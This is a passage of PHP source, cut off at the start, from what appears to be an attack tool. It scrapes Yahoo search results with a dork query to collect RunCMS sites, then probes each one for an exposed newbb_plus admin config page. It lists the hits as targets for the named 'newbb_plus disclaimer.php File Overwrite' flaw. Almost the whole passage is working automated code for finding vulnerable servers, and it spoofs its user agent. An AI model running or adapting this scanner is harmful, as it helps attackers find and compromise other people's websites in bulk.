No response from '.htmlentities($host).'
';
}
// Start
if(isset($_POST['Start'] ,$_POST['StartPage'] ,$_POST['PerPage']))
{
$StartPage = ((intval($_POST['StartPage'])) > 0) ? intval($_POST['StartPage']) : 1;
$PerPage = ((intval($_POST['PerPage'])) <= 100) ? intval($_POST['PerPage']) : 100;
if (($StartPage*$PerPage) > 1000)
{
echo "Yahoo! Search doesn't show More than 1000 Results per query"."
";
die();
}
echo 'Trying to obtain URLs Which are suspected to "newbb_plus disclaimer.php
File Overwrite" ...'.'
';
$Yahoo = "search.yahoo.com";
$S = $StartPage;
$P = $PerPage;
for ($S; $S*$P < 1000; $S++)
{
$host = $Yahoo;
$B = ($S == 1) ? '' : '&b='.((($S-1)*$P)+1);
$Query = "/search?p=runcms+inurl%3A%22%2Fmodules%2Fnews%2F%22&n=$P&ei=utf-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=url&vd=all&vst=0&vf=all&vm=p&fl=0&xargs=0&pstart=1".$B;
$packet = "GET ".$Query." HTTP/1.1\r\n";
$packet .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacket($packet);
if(stristr($html , '403 Forbidden') === false
&& stristr($html , '302 Moved') === false)
{
echo '
Obtained URLs From Page:'.($S).'
';
$Pattern = '/href="http:\/\/?([^\/]+)?(\/[a-zA-Z]+)?(\/modules\/news\/)/i';
preg_match_all($Pattern, $html, $Matches);
$TotalLinks = count($Matches[1]);
echo "In Progress
";
for ($I=0; $I < $TotalLinks; $I++)
{
echo ".";
if ($Matches[2][$I] == '')
{
$Path = "/modules/newbb_plus/admin/forum_config.php";
}else
$Path = $Matches[2][$I]."/modules/newbb_plus/admin/forum_config.php";
$host = $Matches[1][$I];
$packet = "GET ".$Path." HTTP/1.1\r\n";
$packet .= "User-Agent: Shareaza v1.x.x.xx\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacket($packet);
if(stristr($html , '_MD_A_CONFIGFORUM') !== false)
{
echo "
".$host.$Path."
";
}
}
}else
{
echo '
'.'Yahoo! finds out that this in an automated request
from a malware! So try again after awhile!';
die();
}
}
}
?>